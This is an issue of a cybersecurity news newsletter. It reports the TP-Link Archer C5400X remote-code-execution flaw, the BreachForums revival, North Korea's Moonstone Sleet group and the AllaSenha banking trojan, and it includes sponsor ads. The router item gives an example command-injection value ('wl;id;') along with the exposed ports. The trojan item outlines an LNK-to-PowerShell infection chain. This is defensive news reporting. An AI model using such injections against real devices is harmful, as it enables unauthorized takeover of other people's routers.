May 31 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatโs blowing up like a vindaloo ๐ฅ๐ฅ๐ฅ
Itโs Friday, folks, which can only mean one thingโฆ Itโs time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโs it.
Congrats, the cybercriminals are no matchโฆ for your patch! ๐ฉน๐ฉน๐ฉน
โ ๏ธ Urgent Update: Critical Security Flaw in TP-Link Archer C5400X Router ๐จ
A maximum-severity vulnerability (CVE-2024-5035, CVSS 10.0) in the TP-Link Archer C5400X gaming router has been disclosed, allowing remote code execution via specially crafted requests. ๐ฅ The flaw impacts all firmware versions up to 1_1.1.6 and has been patched in version 1_1.1.7, released on May 24, 2024. ๐ ๏ธ
Exploit Details ๐
โย The flaw resides in the "rftest" binary, which exposes a network listener on TCP ports 8888, 8889, and 8890.
โย Attackers can bypass command restrictions by injecting shell meta-characters (e.g., "wl;id;") to gain arbitrary command execution with elevated privileges.
Patch Information ๐ฉน
The new firmware version 1_1.1.7 Build 20240510 mitigates the issue by discarding commands containing special characters.
Security Advice ๐ก๏ธ
Update your TP-Link Archer C5400X router to the latest firmware immediately to protect against potential exploitation.
This fix is critical to prevent remote unauthenticated attackers from gaining control over your device.
Background ๐๏ธ
The flaw was discovered by German cybersecurity firm ONEKEY, emphasising the importance of securing wireless device configuration APIs.
The disclosure follows recent vulnerabilities in other networking devices, highlighting ongoing security challenges.
Now, on to todayโs hottest cybersecurity news stories:
๐ฌ BreachForums is back with a brand new agenda ๐
๐ Introducing Moonstone Sleet, N. Korea's latest ๐ฅก
๐ง Brazilian banks hit with AllaKore variant = AllaSenha ๐จโ๐ป
Just two weeks after a major U.S. law enforcement takedown, the notorious BreachForums is back in action at breachforums[.]st! ๐ The revival was announced by ShinyHunters, who is now selling a massive 1.3 TB database of 560 million Ticketmaster customers for $500,000. ๐ฒ
What's Inside? ๐ฆ
The database allegedly contains:
โย Full names, addresses, email addresses, phone numbers
โย Ticket sales and event info
โย Last four digits of credit cards and expiration dates ๐ณ
Sign-Up Required! โ ๏ธ
Visitors now need to sign up for an account to view content. ๐
Law Enforcement Strikes ๐ฎ
Earlier, U.S. authorities dismantled BreachForums and seized its domains (.st/.cx/.is/.vc) and Baphometโs Telegram channel. The FBI is reviewing backend data. ๐ต๏ธโโ๏ธ
Who's Behind It? ๐ค
It's unclear if the current ShinyHunters is the original hacker. The domain was reportedly reclaimed from NiceNIC. Is it a honeypot? Cybersecurity experts are sceptical. ๐ค
A Brief History ๐
BreachForums rose in March 2022 post-RaidForums' shutdown and re-emerged in mid-June 2023 after another takedown. The DoJ and FBI have yet to comment on the latest developments. ๐ถ๏ธ
Stay tuned for more updates on this unfolding cyber drama! ๐
A new North Korean cyber threat actor, Moonstone Sleet, is targeting software, IT, education, and defence sectors with sophisticated ransomware and malware. ๐ This group is closely linked to the infamous Lazarus Group.
Deceptive Tactics ๐ญ
Moonstone Sleet sets up fake companies and job offers, using trojanized tools, malicious games, and custom ransomware. They employ both tried-and-true and unique methods to achieve their goals. ๐ญ
Fake Jobs and Malicious Tools ๐ ๏ธ
โย Fake job offers and companies lure targets in
โย Trojanized tools like modified PuTTY drop malicious payloads
โย Malicious npm packages delivered through LinkedIn and freelancing sites ๐งโ๐ป
Dangerous Malware ๐พ
Their attacks involve:
โย Custom ransomware FakePenny
โย Malicious game DeTankWar with embedded malware loaders ๐ฎ
โย Credential theft from the Windows LSASS process ๐ก๏ธ
Unique Strategies โ๏ธ
Moonstone Sleet creates fake companies (e.g., C.C. Waterfall, StarGlow Ventures) to approach targets, often posing as blockchain or software development firms. Emails often include tracking pixels to gauge interest. ๐ง
Recent Attacks โ๏ธ
Recent campaigns include targeting defence companies with ransomware demanding $6.6 million in Bitcoin. Microsoft urges vigilance against supply chain attacks. ๐ผ
Evolving Threat ๐
Moonstone Sleetโs tactics have evolved from other North Korean threat actors, demonstrating their growing sophistication and ambition. Stay alert and secure! ๐จ
Stay ahead of the curve with Presspool.ai! ๐ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐ค๐ก Thatโs us, alright! ๐คต How about you? Visionary AI executive, much? ๐
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐ค๐ฉโ๐ป๐
Rest assured, the process is very straightforward.
You simply:
๐ Sign Up & Create Campaign
๐ Define your audience, budget, and message to captivate your audience.
๐ Launch your campaign, as Presspoolโs AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ฏ
๐ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐ Elevate your marketing game and stay informed with Presspool.ai! ๐ Simples! ๐ฆฆ
Presspool.aiย ๐ฐ๐๐ค may just have what you need to succeed. And if the product isnโt for you, the newsletter alone is a gamechanger. And we know newsletters ๐
Brazilian banks are facing a new cyber threat: a custom variant of the AllaKore RAT called AllaSenha. This malware targets banking credentials using Azure cloud for command-and-control. ๐ฆ
Whoโs at Risk? โ
Targets include major banks like Banco do Brasil, Bradesco, Itaรบ Unibanco, and more. The attack likely starts with phishing messages containing malicious links. ๐ง
How It Works ๐ ๏ธ
โย LNK File Trick: A malicious shortcut file (NotaFiscal.pdf.lnk) is disguised as a PDF.
โย BAT Payload: Launches a Base64-encoded PowerShell command.
โย Python and DLL: Downloads Python, runs a script (BPyCode), and loads a DLL in memory. ๐
Malicious Operations ๐
AllaSenha steals credentials and captures 2FA codes using overlay windows. It can even trick users into scanning QR codes for fraudulent transactions. ๐ฑ
Key Findings ๐
โย Cloud C2: Uses Microsoft Azure Functions for flexible infrastructure.
โย Portuguese-Speaking Developer: Likely linked to a user named bert1m.
โย High Productivity: Latin American threat actors are prolific in cybercrime campaigns.
Wider Impact ๐
These attacks, while focusing on Latin America, often affect global companies. Malspam campaigns with banking trojans like Casbaneiro are also targeting financial data. ๐
Mobile Threats ๐ฑ
Not just Windows โ Android banking trojan Anatsa infiltrated the Google Play Store, disguised as productivity apps, stealing banking credentials through overlays. ๐ฒ
Stay Vigilant! ๐
Protect your accounts and stay aware of phishing tactics. Cybersecurity measures are crucial to defending against these sophisticated attacks. ๐ก๏ธ
See you next week, cyber squad ๐ฅ
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!